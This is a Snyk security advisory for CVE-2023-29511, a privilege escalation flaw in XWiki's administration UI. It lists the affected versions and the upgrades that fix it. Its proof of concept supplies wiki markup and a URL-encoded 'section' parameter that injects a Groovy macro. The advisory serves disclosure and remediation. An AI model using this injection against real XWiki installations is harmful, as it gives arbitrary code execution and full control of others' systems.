Privilege Escalation Affecting org.xwiki.platform:xwiki-platform-administration-ui package, versions [,13.10.11)[14.0-rc-1,14.4.8)[14.5,14.10.1)


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.27% (69th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JAVA-ORGXWIKIPLATFORM-5421187
  • published13 Apr 2023
  • disclosed12 Apr 2023
  • creditUnknown

Introduced: 12 Apr 2023

CVE-2023-29511  (opens in a new tab)
CWE-264  (opens in a new tab)

How to fix?

Upgrade org.xwiki.platform:xwiki-platform-administration-ui to version 13.10.11, 14.4.8, 14.10.1 or higher.

Overview

Affected versions of this package are vulnerable to Privilege Escalation by any user with edit rights on a page (including their own user page), who can execute arbitrary Groovy, Python or Velocity code via section ids in XWiki.AdminFieldsDisplaySheet, leading to full access to the XWiki installation.

PoC

Add

{{template name="admin.vm" output="false"/}}

{{display reference="XWiki.AdminFieldsDisplaySheet"/}}

to any page where the user has edit rights, and supply

section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

as a URL parameter.

CVSS Scores

version 3.1